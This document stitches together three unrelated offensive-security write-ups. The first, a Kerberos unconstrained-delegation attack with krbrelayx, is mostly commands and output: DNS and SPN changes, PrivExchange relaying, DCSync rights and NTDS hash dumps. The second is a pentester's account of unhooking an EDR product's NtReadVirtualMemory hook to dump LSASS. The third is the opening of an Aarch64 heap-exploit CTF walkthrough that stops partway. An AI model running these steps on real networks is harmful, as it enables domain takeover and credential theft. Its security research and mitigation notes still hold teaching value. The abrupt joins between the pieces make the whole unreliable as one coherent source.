Server: 192.168.111.2
Address: 192.168.111.2#53
Now we get the Domain Controller to authenticate to us via the printer bug, while we start krbrelayx in export mode, in which all extracted TGTs will be saved to disk. We provide the AES256 key to krbrelayx, since this key will be used by default for computer accounts.
[*] Attempting to trigger authentication via rprn RPC at icorp-dc.internal.corp
[*] Bind OK
[*] Got handle
DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Triggered RPC backconnect, this may or may not have worked
krbrelayx on a different screen:
user@localhost:~/krbrelayx$ sudo python krbrelayx.py -aesKey 9ff86898afa70f5f7b9f2bf16320cb38edb2639409e1bc441ac417fac1fed5ab
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client SMB loaded..
[*] Running in export mode (all tickets will be saved to disk)
[*] Setting up SMB Server
[*] Setting up HTTP Server
[*] Servers started, waiting for connections
[*] SMBD: Received connection from 192.168.111.2
[*] Got ticket for ICORP-DC$@INTERNAL.CORP [krbtgt@INTERNAL.CORP]
[*] Saving ticket in ICORP-DC$@INTERNAL.CORP_krbtgt@INTERNAL.CORP.ccache
[*] SMBD: Received connection from 192.168.111.2
This gives us a TGT of the domain controller account, which has DC Sync privileges in the domain, meaning we can extract the hashes of all the accounts in the directory.
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a39494027fd39934e08a713c999e8cf3:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:33168b759a89c059815d7aea5c27a3d9:::
...etc...
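The dump above uses the domain\uid:rid:lmhash:nthash layout named in its first line. As a small sketch (the helper names are hypothetical), the lines can be split into fields, and accounts whose NT hash is the well-known hash of an empty password can be flagged, such as Guest in this output.

```python
# NT hash of the empty string (an account with a blank password).
EMPTY_NT_HASH = "31d6cfe0d16ae931b73c59d7e0c089c0"


def parse_ntds_line(line: str):
    """Parse one 'uid:rid:lmhash:nthash:::' line; return None for other lines."""
    parts = line.strip().split(":")
    if len(parts) < 4 or not parts[1].isdigit():
        return None
    name, rid, lmhash, nthash = parts[:4]
    return {"name": name, "rid": int(rid), "lmhash": lmhash, "nthash": nthash}


def has_empty_password(entry: dict) -> bool:
    """Return True if the entry's NT hash is that of an empty password."""
    return entry["nthash"].lower() == EMPTY_NT_HASH


SAMPLE_LINES = [
    "Administrator:500:aad3b435b51404eeaad3b435b51404ee:a39494027fd39934e08a713c999e8cf3:::",
    "Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::",
    "...etc...",
]

entries = [e for e in map(parse_ntds_line, SAMPLE_LINES) if e is not None]
print([e["name"] for e in entries if has_empty_password(e)])
```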
Use case 2: Abusing a service account and PrivExchange
The previous use case used a computer account and an SMB connection to obtain the TGT of a DC. While the above described method is the only way to perform this attack without executing code on the compromised host (all data is obtained via RPC calls, and the DC only connects to the attacker machine), usually it would be easier to trigger an SMB connection to the compromised host, dump LSASS memory and/or use Mimikatz or Rubeus to extract the TGTs from memory. This would not require modifying DNS records and SPNs. In the next case we will be using a user account (that is used as a service account) instead of a computer account. This is more complex or even impossible to exploit without modifying information in AD. If the user account is for example used for an MSSQL service, it would only be possible to extract the TGT from LSASS if we could somehow convince a victim to connect to the MSSQL service and also have Administrative access to the server to run the code that extracts the tickets from memory. By adding an extra SPN to the user account we can use existing tools such as the SpoolService bug or PrivExchange to exploit this via HTTP or SMB, without the need to touch the host on which this service is running at all.
This requires two things:
The password of the service account
Delegated control over the service account object
The password for the service account could have been previously obtained using a Kerberoast or password spraying attack. Delegated control over the account is required to add an SPN to it. This control could be present because the service account is part of an Organisational Unit over which control was delegated to a sysadmin, or because we compromised an account in a high privilege group, such as Account Operators.
In this scenario we have control over a helpdesk user, which has been delegated the rights to manage users in the Service Accounts OU. We also discovered that the service account sqlserv has the weak password Internal01 set. This service account only has an SPN for the MSSQL service running on database.internal.corp. Since we want to escalate privileges via Exchange with PrivExchange, which connects over HTTP, we add a new SPN using this account for http/evil.internal.corp:
user@localhost:~/krbrelayx$ python addspn.py -u icorp\\helpdesk -p Welkom01 -t sqlserv -s http/evil.internal.corp -q icorp-dc.internal.corp
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
DN: CN=sqlserv,OU=Service Accounts,DC=internal,DC=corp - STATUS: Read - READ TIME: 2019-01-27T15:26:16.580450
sAMAccountName: sqlserv
servicePrincipalName: MSSQL/database.internal.corp
user@localhost:~/krbrelayx$ python addspn.py -u icorp\\helpdesk -p Welkom01 -t sqlserv -s http/evil.internal.corp icorp-dc.internal.corp
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
[+] SPN Modified successfully
As with the previous attack, we add a DNS record that points to our attacker's IP:
user@localhost:~/krbrelayx$ python dnstool.py -u icorp\\helpdesk -p Welkom01 -r evil.internal.corp -d 192.168.111.87 --action add icorp-dc.internal.corp
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully
Now we can start krbrelayx.py. Since we are working with a user account, by default tickets will be encrypted with RC4, so we need to calculate the NTLM hash of the password in order to decrypt them (we don’t need to bother with a Kerberos salt here because RC4 doesn’t use one).
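The NTLM (NT) hash mentioned above is simply MD4 over the UTF-16LE encoded password. The sketch below is one way to calculate it; it ships its own small MD4 (following RFC 1320) because `hashlib` builds do not always expose `md4`. The function names `md4` and `nt_hash` are made up for this illustration and are not part of krbrelayx or impacket.

```python
import struct


def _rol(value, bits):
    """Rotate a 32-bit value left by `bits`."""
    return ((value << bits) | (value >> (32 - bits))) & 0xFFFFFFFF


def md4(message: bytes) -> bytes:
    """Pure-Python MD4 as described in RFC 1320."""
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    bit_len = len(message) * 8
    # Padding: a single 0x80 byte, zeros up to 56 mod 64, then the bit length.
    message += b"\x80"
    message += b"\x00" * ((56 - len(message) % 64) % 64)
    message += struct.pack("<Q", bit_len)

    # (boolean function, additive constant, word order, shift amounts)
    rounds = (
        (lambda x, y, z: (x & y) | (~x & z), 0x00000000,
         list(range(16)), (3, 7, 11, 19)),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999,
         [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13)),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1,
         [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15)),
    )

    for offset in range(0, len(message), 64):
        words = struct.unpack("<16I", message[offset:offset + 64])
        a, b, c, d = state
        for func, const, order, shifts in rounds:
            for i, k in enumerate(order):
                total = (a + func(b, c, d) + words[k] + const) & 0xFFFFFFFF
                a = _rol(total, shifts[i % 4])
                # Rotate register roles: ABCD -> DABC -> CDAB -> BCDA -> ABCD
                a, b, c, d = d, a, b, c
        state = [(s + v) & 0xFFFFFFFF for s, v in zip(state, (a, b, c, d))]

    return struct.pack("<4I", *state)


def nt_hash(password: str) -> str:
    """NT hash: MD4 over the UTF-16LE encoded password, no salt involved."""
    return md4(password.encode("utf-16-le")).hex()


if __name__ == "__main__":
    # An empty password gives the well-known "blank" NT hash.
    print(nt_hash(""))
```

The empty-password result is the same value that shows up for the Guest account in the secretsdump output earlier, which is a quick sanity check that the routine behaves as expected.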
This hash we can pass to krbrelayx.py and we can start the server. This time, instead of exporting the ticket, we use it directly to connect to LDAP and grant our helpdesk user DCSync privileges using the -t ldap://icorp-dc.internal.corp flag. We run privexchange.py and krbrelayx.py at the same time:
user@localhost:~/privexchange$ python privexchange.py -u helpdesk -p Welkom01 -ah evil.internal.corp exchange.internal.corp -d internal.corp
INFO: Using attacker URL: http://evil.internal.corp/privexchange/
INFO: Exchange returned HTTP status 200 - authentication was OK
INFO: API call was successful
And we see the attack doing its work in a very similar way to ntlmrelayx:
user@localhost:~/krbrelayx$ sudo python krbrelayx.py -hashes aad3b435b51404eeaad3b435b51404ee:d3026ba6ef6215da295175934b3d0e09 -t ldap://icorp-dc.internal.corp --escalate-user helpdesk
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client SMB loaded..
[*] Running in attack mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server
[*] Servers started, waiting for connections
[*] HTTPD: Received connection from 192.168.111.56, prompting for authentication
[*] HTTPD: Client requested path: /privexchange/
[*] HTTPD: Received connection from 192.168.111.56, prompting for authentication
[*] HTTPD: Client requested path: /privexchange/
[*] Got ticket for EXCHANGE$@INTERNAL.CORP [krbtgt@INTERNAL.CORP]
[*] Saving ticket in EXCHANGE$@INTERNAL.CORP_krbtgt@INTERNAL.CORP.ccache
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] User privileges found: Create user
[*] User privileges found: Modifying domain ACL
[*] Querying domain security descriptor
[*] Success! User helpdesk now has Replication-Get-Changes-All privileges on the domain
[*] Try using DCSync with secretsdump.py and this user :)
[*] Saved restore state to aclpwn-20190210-132437.restore
The advantage (for an attacker) of this is that it uses Kerberos functionality instead of NTLM relaying, and thus mitigations against NTLM relaying do not apply (but it does require much higher privileges to perform). We could also have avoided calculating the hashes manually by specifying the password on the command line together with the correct salt, which makes krbrelayx calculate all the keys by itself:
The previous paragraphs show us how we can abuse unconstrained delegation, but we haven’t yet touched on how it all works under the hood. Let’s have a look at how a Windows 10 client uses Kerberos with unconstrained delegation. Some write-ups mention that whenever the Windows 10 client requests a service ticket to a host with unconstrained delegation, this ticket automatically includes a delegated version of a TGT. This is not how it actually works. Let’s look at what happens over the wire when a host authenticates to our attacker service.
When our user (testuser) logs in on the workstation, a TGT is requested from the DC (the KDC in this case). This is visible via two AS-REQs, the initial one which requests the TGT without any kind of information, and a second one in which preauthentication information is included.
In the reply to the first AS-REQ, we see that the server replies with the correct salt that should be used for AES key derivation from the password:
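For reference, the salt returned by the KDC normally follows a fixed pattern in Active Directory, so it can usually be predicted without sniffing the AS-REP. The sketch below shows the commonly documented construction. The helper names are invented for this example, and the rules are an assumption that holds for default setups (accounts that were renamed can keep an older salt).

```python
def user_salt(realm: str, sam_account_name: str) -> str:
    """Salt for a user account: upper-cased realm followed by the account name."""
    return realm.upper() + sam_account_name


def computer_salt(realm: str, sam_account_name: str) -> str:
    """Salt for a computer account: REALM + 'host' + lower-cased FQDN of the machine."""
    hostname = sam_account_name.rstrip("$").lower()
    return realm.upper() + "host" + hostname + "." + realm.lower()


if __name__ == "__main__":
    print(user_salt("internal.corp", "testuser"))
    print(computer_salt("internal.corp", "ICORP-DC$"))
```

This salt is only relevant for the AES key types; as noted earlier, RC4 keys are unsalted.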
Now we make the client connect to our malicious SMB server hosted using krbrelayx. In the traffic we see two requests for a service ticket (TGS-REQ), followed by some SMB traffic in which the Kerberos authentication is performed.
Let’s take a closer look at these TGS requests. The first one is as expected: a service ticket is requested for the cifs/attacker.internal.corp SPN which we added to our account previously.
The second one however is interesting. This time the server requests a service ticket not for the service it is connecting to, but for the krbtgt/internal.corp SPN. This is similar to an AS-REQ request, in which this SPN is also used, but now it’s used in a TGS-REQ structure using the TGT with an authenticator. The second interesting part is the flags, especially the forwarded flag. This flag is used to request a TGT which can be used for delegation and will later be sent to the attacker’s rogue service.
How does Windows know whether it should request a forwarded TGT and send this to a server when authenticating? The encrypted ticket part has a ‘flags’ field, in which the ticket options are specified. RFC4120 defines an OK-AS-DELEGATE flag, which specifies that the target server is trusted for unconstrained delegation. Some changes made to getST.py from impacket show us that this flag is indeed set. It is easier, however, to just list the tickets in Windows with klist:
This command also shows us the forwarded TGT that will be sent to the attacker:
The attacker’s view
From the attacker’s perspective, we have set up krbrelayx and it is listening on port 445 and 80 to accept SMB and HTTP connections. When the victim connects to us (examples of how to trigger this are given above), they will authenticate with Kerberos if we request this. Unlike with NTLM authentication, which requires multiple messages back and forth, a client will directly send their Kerberos ticket upon authenticating. In both SMB and HTTP the GSS-API and SPNEGO protocols are used to wrap Kerberos authentication.
Whoever designed these protocols thought it would be a great idea to not only use ASN.1, but to mix ASN.1 with some custom binary constants in one structure (and to let part of that structure depend on the constant). This makes it pretty unusable with any standard ASN.1 library. Fortunately I did find some ways to hack around this, which is already an improvement on having to write your own ASN.1 parser.
Once we have reliably parsed the structure, we can see the AP_REQ message containing a Kerberos ticket and an authenticator. These are both important in Kerberos authentication:
The ticket is encrypted with the password of “our” service. It contains information that identifies the user who is authenticating, as well as an encrypted session key. This ticket is also used for authorization, since it contains a PAC with the groups the user is a member of.
The authenticator is a structure encrypted with the session key. It proves the client is in possession of this key and is used to authenticate the client.
When you see this in Wireshark, it is easy to notice the difference between a regular Kerberos AP_REQ packet and one where a TGT is sent along with it (unconstrained delegation). A regular AP_REQ packet will contain an encrypted ticket, which is the largest substructure in the AP_REQ structure. In the case of my test domain, the ticket is 1180 bytes. If unconstrained delegation is used, the largest substructure in the AP_REQ is the authenticator, which contains the delegated TGT from the user. In my domain this is 1832 bytes. An authenticator that doesn’t contain a TGT is usually much smaller, around 400 bytes.
Using the previously calculated Kerberos keys, we decrypt the ticket and get the following structure:
Contained within are the ticket validity, the username of the ticket, some Authorization Data (which includes the user PAC), and an Encryption key. This Encryption key is the session key, with which we can decrypt the authenticator of the
Here we see again the user that authenticated, another encryption key (subkey), more authorization data, and a checksum (which I’ve cut short). The checksum is the interesting part. If its value is equal to 32771 (or 0x8003) it means that it is a KRBv5 checksum, which is a special structure defined in RFC4121 section 4.1.1 (apparently the authors of the RFC were also tired of ASN.1, introducing another custom format for transferring binary data).
Within this checksum field, (if the correct flags are set), we can find a KRB_CRED structure (back to ASN.1!) which contains the delegated TGT.
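To make the layout of that checksum field more concrete, here is a minimal parser sketch based on the field order given in RFC 4121 section 4.1.1 (binding length, channel bindings, flags, then the optional delegation fields, all little-endian). It is not the code from kerberos.py; the function name and the returned dictionary are assumptions made for this illustration, and the KRB_CRED bytes are returned undecoded.

```python
import struct

GSS_CHECKSUM_TYPE = 0x8003  # 32771, the checksum type discussed above
GSS_C_DELEG_FLAG = 0x1      # context flag: a delegated credential is included


def parse_gss_checksum(data: bytes) -> dict:
    """Split an RFC 4121 section 4.1.1 checksum into its fields."""
    # Lgth: length of the channel binding field (currently always 16)
    (bnd_len,) = struct.unpack_from("<I", data, 0)
    bindings = data[4:4 + bnd_len]
    pos = 4 + bnd_len

    # Flags: four-byte context establishment flags
    (flags,) = struct.unpack_from("<I", data, pos)
    pos += 4

    result = {"bindings": bindings, "flags": flags, "krb_cred": None}

    # DlgOpt / Dlgth / Deleg are only present when delegation was requested
    if flags & GSS_C_DELEG_FLAG and len(data) >= pos + 4:
        dlg_opt, dlg_len = struct.unpack_from("<HH", data, pos)
        pos += 4
        if dlg_opt == 1:
            # Raw ASN.1 encoded KRB_CRED; its enc-part still needs decrypting
            result["krb_cred"] = data[pos:pos + dlg_len]
    return result


if __name__ == "__main__":
    # Synthetic example: 16 zero bytes of bindings, deleg flag set,
    # and four placeholder bytes standing in for a KRB_CRED blob.
    fake_cred = b"\x76\x03\x02\x01"
    sample = (struct.pack("<I", 16) + b"\x00" * 16 + struct.pack("<I", 0x3)
              + struct.pack("<HH", 1, len(fake_cred)) + fake_cred)
    print(parse_gss_checksum(sample))
```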
There is one more step separating us from obtaining our TGT, which is decrypting the enc-part. This encrypted part of the KRB_CRED structure contains the ticket information, including the session key associated with the delegated TGT, which we need to request service tickets at the DC. After decryption, the tickets are saved to disk, either in ccache format, which is used by impacket, or in kirbi format (which is the name used by Mimikatz for KRB_CRED structured files). The delegated TGT can now be used by other tools to authenticate to any system in the domain.
If this wasn’t detailed enough for you yet, all the steps described in this section are outlined in the kerberos.py file of krbrelayx. If you uncomment the print statements at various stages you can view the full structures.
Mitigations and detection
The most straightforward mitigation is to avoid using unconstrained delegation wherever possible. Constrained delegation is much safer and while it can be abused as well, constrained delegation only allows for authentication to services which you explicitly specify, making it possible to make a risk analysis for individual services. Unconstrained delegation makes this depend on whichever user connects to the service, which then has their credentials exposed. If running accounts with unconstrained delegation rights cannot be avoided, the following mitigations can be applied:
Make sure to guard the systems that have these privileges as sensitive assets from which domain compromise is likely possible.
Protect sensitive accounts by enabling the “Account is sensitive and cannot be delegated” option.
Place administrative accounts in the “Protected Users” group, which will prevent their credentials from being delegated.
Make sure that administrative accounts perform their actions from up-to-date workstations with Credential Guard enabled, which will prevent credential delegation.
Regarding detection, Roberto Rodriguez from Specterops wrote an article a while back about the exact events involved with unconstrained delegation which allow detection of unconstrained delegation abuse.
Tooling
The tools are available on my GitHub: https://github.com/dirkjanm/krbrelayx Please read the README for install instructions and TODO items/limitations!
On a recent internal penetration engagement, I was up against an EDR product that I will not name. This product greatly hindered my ability to access lsass’ memory and use our own custom flavor of Mimikatz to dump clear-text credentials.
For those who recommend ProcDump
The Wrong Path
So now, as an ex-malware author, I know that there are a few things you could do as a driver to accomplish this detection and block. The first thing that came to my mind was ObRegisterCallbacks, which is commonly used by many antivirus products. Microsoft implemented this callback because many antivirus products were performing very sketchy WinAPI hooks that resemble malware rootkits. However, at the bottom of the MSDN page, you will notice a text saying “Available starting with Windows Vista with Service Pack 1 (SP1) and Windows Server 2008.” To give some missing context, I am on a Windows Server 2003 machine at the moment. Therefore, it is missing the necessary function to perform this block.
After spending hours and hours, doing black magic stuff with csrss.exe and attempting to inherit a handle to lsass.exe through csrss.exe, I was successful in gaining a handle with PROCESS_ALL_ACCESS to lsass.exe. This was through abusing csrss to spawn a child process and then inherit the already existing handle to lsass.
There is no EDR solution on this machine, this was just a PoC
However, just as I was thinking “I got this!” and was ready to rejoice in victory over a certain EDR, I was met with a disappointing conclusion. The EDR blocked the shellcode injection into csrss as well as the thread creation through RtlCreateUserThread. Yet for some reason the code, while failing to spawn as a child process and inherit the handle, was still somehow able to get the PROCESS_ALL_ACCESS handle to lsass.exe.
WHAT?!
Hold up, let me try just opening a handle to lsass.exe without any fancy stuff with just this line:
And what do you know, I got a handle with FULL CONTROL over lsass.exe. The EDR did not make a single fuss about this. This is when I realized that I had started off with the wrong approach: the EDR never really cared about you gaining the handle. It is what you do afterward with that handle that will come under scrutiny.
Back on Track
Knowing there was no fancy trick in getting a full control handle to lsass.exe, we can now move forward to find the next point of the issue. Immediately calling MiniDumpWriteDump() with the handle failed spectacularly.
Let’s dissect this warning further. “Violation: LsassRead”. I didn’t read anything, what are you talking about? I just want to do a dump of the process. However, I also know that to make a dump of a remote process, there must be some sort of WINAPI being called such as ReadProcessMemory (RPM) inside MiniDumpWriteDump(). Let’s look at MiniDumpWriteDump’s source code at ReactOS.
Multiple calls to RPM
As you can see, the function (2) dump_exception_info(), as well as many other functions, relies on (3) RPM to perform its duty. These functions are referenced by MiniDumpWriteDump (1), and this is probably the root of our issue. Now here is where a bit of experience comes into play. You must understand Windows system internals and how WINAPIs are processed. Using ReadProcessMemory as an example, it works like this.
ReadProcessMemory is just a wrapper. It does a bunch of sanity checks, such as a nullptr check. That is all RPM does. However, RPM also calls a function, “NtReadVirtualMemory”, which sets up the registers before executing a syscall instruction. The syscall instruction just tells the CPU to enter kernel mode, where another function ALSO named NtReadVirtualMemory is called, which does the actual logic of what ReadProcessMemory is supposed to do.
With that knowledge, we now must identify HOW the EDR product is detecting and stopping the RPM/NtReadVirtualMemory call. This comes as a simple answer which is “hooking”. Please refer to my previous post regarding hooking here for more information. In short, it gives you the ability to put your code in the middle of any function and gain access to the arguments as well as the return variable. I am 100% sure that the EDR is using some sort of hook through one or more of the various techniques that I mentioned.
However, readers should know that most if not all EDR products use a service, specifically a driver running inside kernel mode. With access to kernel mode, the driver could perform the hook at ANY level of RPM’s call stack. However, it would open up a huge security hole in a Windows environment if it was trivial for any driver to hook ANY level of a function. Therefore, a solution was put forward to prevent modifications of this nature, and that solution is known as Kernel Patch Protection (KPP or PatchGuard). KPP scans the kernel on almost every level and will trigger a BSOD if a modification is detected. This includes the ntoskrnl portion, which houses the kernel-level logic of the WINAPIs. With this knowledge, we are assured that the EDR would not and did not hook any kernel-level function inside that portion of the call stack, leaving us with the user-land RPM and NtReadVirtualMemory calls.
The Hook
To see where the function is located inside our application’s memory, it is as trivial as a printf with %p format string and the function name as the argument, such as below.
However, unlike RPM, NtReadVirtualMemory is not declared in the standard Windows headers, and therefore you cannot just reference the function like normal. You must specify the signature of the function yourself and link ntdll.lib into your project to do so.
With everything in place, let’s run it and take a look!
Now, this provides us with the address of both RPM and NtReadVirtualMemory. I will now use my favorite reversing tool, Cheat Engine, to read the memory and analyze its structure.
ReadProcessMemory / NtReadVirtualMemory
For the RPM function, it looks fine. It does some stack and register setup and then calls ReadProcessMemory inside Kernelbase (topic for another time), which would eventually lead you down into ntdll’s NtReadVirtualMemory. However, if you look at NtReadVirtualMemory and know what the most basic detour hook looks like, you can tell that this is not normal. The first 5 bytes of the function are modified and the rest are left as-is. You can tell this by looking at other similar functions around it. All the other functions follow a very similar format:
The only difference is the syscall id (which identifies the WINAPI function to be called once inside kernel land). However, for NtReadVirtualMemory, the first instruction is actually a JMP instruction to an address somewhere else in memory. Let’s follow that.
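The comparison described above (a normal Nt* stub versus one whose first 5 bytes were replaced by a JMP) can be sketched as a small byte check. This is only an illustration under a few assumptions: it expects the usual x64 stub prologue `mov r10, rcx ; mov eax, <syscall id>`, it only recognises the classic 5-byte `E9 rel32` detour, and the addresses and syscall id in the example are made up rather than taken from the screenshots.

```python
import struct

# mov r10, rcx ; mov eax, imm32 -- the start of an unhooked x64 ntdll syscall stub
SYSCALL_STUB_PREFIX = bytes([0x4C, 0x8B, 0xD1, 0xB8])
JMP_REL32 = 0xE9


def inspect_stub(code: bytes, address: int) -> dict:
    """Classify the first bytes of an Nt* function read from memory."""
    if code[:4] == SYSCALL_STUB_PREFIX:
        # Bytes 4..7 are the immediate loaded into eax: the syscall id
        (syscall_id,) = struct.unpack_from("<I", code, 4)
        return {"hooked": False, "syscall_id": syscall_id}
    if code[0] == JMP_REL32:
        # jmp rel32: the target is relative to the end of the 5-byte instruction
        (rel,) = struct.unpack_from("<i", code, 1)
        target = (address + 5 + rel) & 0xFFFFFFFFFFFFFFFF
        return {"hooked": True, "target": target}
    return {"hooked": None}  # unknown prologue, needs manual inspection


if __name__ == "__main__":
    clean = bytes.fromhex("4c8bd1b83f0000000f05c3")        # hypothetical clean stub
    hooked = bytes.fromhex("e900100000") + clean[5:]       # first 5 bytes overwritten
    print(inspect_stub(clean, 0x7FFB00001000))
    print(inspect_stub(hooked, 0x7FFB00001000))
```

Resolving the jump target against the list of loaded modules is what tells you which DLL owns the hook.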
CyMemDef64.dll
Okay, so we are no longer inside ntdll’s module but instead inside CyMemDef64.dll’s module. Ahhhhh now I get it.
The EDR placed a jump instruction where the original NtReadVirtualMemory function is supposed to be, redirecting the code flow into their own module, which then checks for any sort of malicious activity. If the checks fail, the Nt* function returns with an error code and never enters kernel land to execute in the first place.
The Bypass
It is now very self-evident what the EDR is doing to detect and stop our WINAPI calls. But how do we get around that? There are two solutions.
Re-Patch the Patch
We know what the NtReadVirtualMemory function SHOULD look like, and we can easily overwrite the jmp instruction with the correct instructions. This will stop our calls from being intercepted by CyMemDef64.dll and let them enter the kernel, where the EDR has no control.
Ntdll IAT Hook
We could also create our own function, similar to what we are doing in Re-Patch the Patch, but instead of overwriting the hooked function, we will recreate it elsewhere. Then, we will walk Ntdll’s Import Address Table, swap out the pointer for NtReadVirtualMemory and point it to our new fixed_NtReadVirtualMemory. The advantage of this method is that if the EDR decides to check on their hook, it will look unmodified. It is just never called, and the ntdll IAT points elsewhere.
The Result
I went with the first approach. It is simple, and it allows me to get out the blog quicker :). However, it would be trivial to do the second method and I have plans on doing just that within a few days. Introducing AndrewSpecial, for my manager Andrew who is currently battling a busted appendix in the hospital right now. Get well soon man.
AndrewSpecial.exe was never caught 😛
Conclusion
This currently works for this particular EDR. However, it would be trivial to reverse similar EDR products and create a universal bypass, given the limits on what they can and cannot hook (thank you, KPP).
Before we dive into the challenge, let’s just skim over the basics quickly. I’ll try to explain everything to the best of my ability and knowledge.
Registers
Aarch64 has 31 general purpose registers, x0 to x30. Since it’s a 64 bit architecture, all the registers are 64 bit. But we can access the lower 32 bits of these registers by using them with the w prefix, such as w0 and w1.
There is also a 32nd register, known as xzr or the zero register. It has multiple uses which I won’t go into, but in certain contexts it is used as the stack pointer (esp equivalent) and is therefore aliased as sp.
Instructions
Here are some basic instructions:
mov: Just like its x86 counterpart, copies one register into another. It can also be used to load immediate values.
mov x0, x1; copies x1 into x0
mov x1, 0x4141; loads the value 0x4141 in x1
str/ldr: store and load register. Basically stores and loads a register from the given pointer.
str x0, [x29]; store x0 at the address in x29
ldr x0, [x29]; load the value from the address in x29 into x0
stp/ldp: store and load a pair of registers. Same as str/ldr but instead with a pair of registers.
stp x29, x30, [sp]; store x29 at sp and x30 at sp+8
bl/blr: Branch link (to register). The x86 equivalent is call. Basically jumps to a subroutine and stores the return address in x30.
blr x0; calls the subroutine at the address stored in x0
b/br: Branch (to register). The x86 equivalent is jmp. Basically jumps to the specified address.
br x0; jump to the address stored in x0
ret: Unlike its x86 equivalent, which pops the return address from the stack, it looks for the return address in the x30 register and jumps there.
Indexing modes
Unlike x86, load/store instructions in Aarch64 have three different indexing “modes” to index offsets:
Immediate offset: [base, #offset]. Index an offset directly and don’t mess with anything else.
ldr x0, [sp, 0x10]; load x0 from sp+0x10
Pre-indexed: [base, #offset]!. Almost the same as above, except that base+offset is written back into base.
ldr x0, [sp, 0x10]!; load x0 from sp+0x10 and then increase sp by 0x10
Post-indexed: [base], #offset. Use the base directly and then write base+offset back into the base.
ldr x0, [sp], 0x10; load x0 from sp and then increase sp by 0x10
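The difference between the three modes is easiest to see when you track the base register. Below is a tiny Python model of `ldr` written for this post; the `regs` and `mem` dictionaries and the `mode` names are purely illustrative and have nothing to do with any real emulator.

```python
def ldr(regs, mem, dst, base, offset=0, mode="offset"):
    """Model `ldr dst, ...` for the three Aarch64 indexing modes."""
    if mode == "offset":      # ldr dst, [base, #offset]
        addr = regs[base] + offset
    elif mode == "pre":       # ldr dst, [base, #offset]!
        regs[base] += offset  # base is updated first, then used as the address
        addr = regs[base]
    elif mode == "post":      # ldr dst, [base], #offset
        addr = regs[base]     # old base is the address, base is updated afterwards
        regs[base] += offset
    else:
        raise ValueError("unknown indexing mode: " + mode)
    regs[dst] = mem[addr]


if __name__ == "__main__":
    mem = {0x1000: 0xAAAA, 0x1010: 0xBBBB}
    for mode in ("offset", "pre", "post"):
        regs = {"x0": 0, "sp": 0x1000}
        ldr(regs, mem, "x0", "sp", 0x10, mode)
        print(mode, hex(regs["x0"]), hex(regs["sp"]))
```

Post-indexed loads such as `ldp x29, x30, [sp], #0x20` are the ones that matter most later on, since they behave like a pop.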
Stack and calling conventions
The registers x0 to x7 are used to pass parameters to subroutines and extra parameters are passed on the stack.
The return address is stored in x30, but during nested subroutine calls, it gets preserved on the stack. It is also known as the link register.
The x29 register is also known as the frame pointer and its x86 equivalent is ebp. All the local variables on the stack are accessed relative to x29 and it holds a pointer to the previous stack frame, just like in x86.
One interesting thing I noticed is that even though ebp is always at the bottom of the current stack frame with the return address right underneath it, the x29 is stored at an optimal position relative to the local variables. In my minimal testcases, it was always stored on the top of the stack (along with the preserved x30) and the local variables underneath it (basically a flipped orientation compared to x86).
The challenge
We are provided with the challenge files and the following description:
Challenge runs on ubuntu 18.04 aarch64, chrooted
It comes with the challenge binary, the libc and a placeholder flag file. It was also mentioned that the challenge is being run in a chroot, so we probably can’t get a shell and would need to do an open/read/write ROP-chain.
The first thing we need is to set up an environment. Fortunately, AWS provides pre-built Aarch64 ubuntu server images and that’s what we will use from now on.
Part 1 — The heap
Not Yet Another Note Challenge...
====== menu ======
1. alloc
2. view
3. edit
4. delete
5. quit
We are greeted with a wonderful and familiar (if you’re a regular CTFer) prompt related to heap challenges.
Playing with it a little, we discover an int underflow in the alloc function, leading to a heap overflow in the edit function:
__int64 do_add()
{
    __int64 v0; // x0
    int v1; // w0
    signed __int64 i; // [xsp+10h] [xbp+10h]
    __int64 v4; // [xsp+18h] [xbp+18h]

    for ( i = 0LL; ; ++i )
    {
        if ( i > 7 )
            return puts("no more room!");
        if ( !mchunks[i].pointer )
            break;
    }
    v0 = printf("len : ");
    v4 = read_int(v0);
    mchunks[i].pointer = malloc(v4);
    if ( !mchunks[i].pointer )
        return puts("couldn't allocate chunk");
    printf("data : ");
    v1 = read(0LL, mchunks[i].pointer, v4 - 1);
    LOWORD(mchunks[i].size) = v1;
    *(_BYTE *)(mchunks[i].pointer + v1) = 0;
    return printf("chunk %d allocated\n");
}

__int64 do_edit()
{
    __int64 v0; // x0
    __int64 result; // x0
    int v2; // w0
    __int64 v3; // [xsp+10h] [xbp+10h]

    v0 = printf("index : ");
    result = read_int(v0);
    v3 = result;
    if ( result >= 0 && result <= 7 )
    {
        result = LOWORD(mchunks[result].size);
        if ( LOWORD(mchunks[v3].size) )
        {
            printf("data : ");
            v2 = read(0LL, mchunks[v3].pointer, (unsigned int)LOWORD(mchunks[v3].size) - 1);
            LOWORD(mchunks[v3].size) = v2;
            result = mchunks[v3].pointer + v2;
            *(_BYTE *)result = 0;
        }
    }
    return result;
}
If we enter 0 as len in alloc, it would allocate a valid heap chunk and read -1 bytes into it. Because read uses unsigned values, -1 would become 0xffffffffffffffff and the read would error out as it’s not possible to read such a huge value.
With read erroring out, the return value (-1 for error) would then be stored in the size member of the global chunk struct. In the edit function, the size is used as a 16 bit unsigned int, so -1 becomes 0xffff, leading to the overflow.
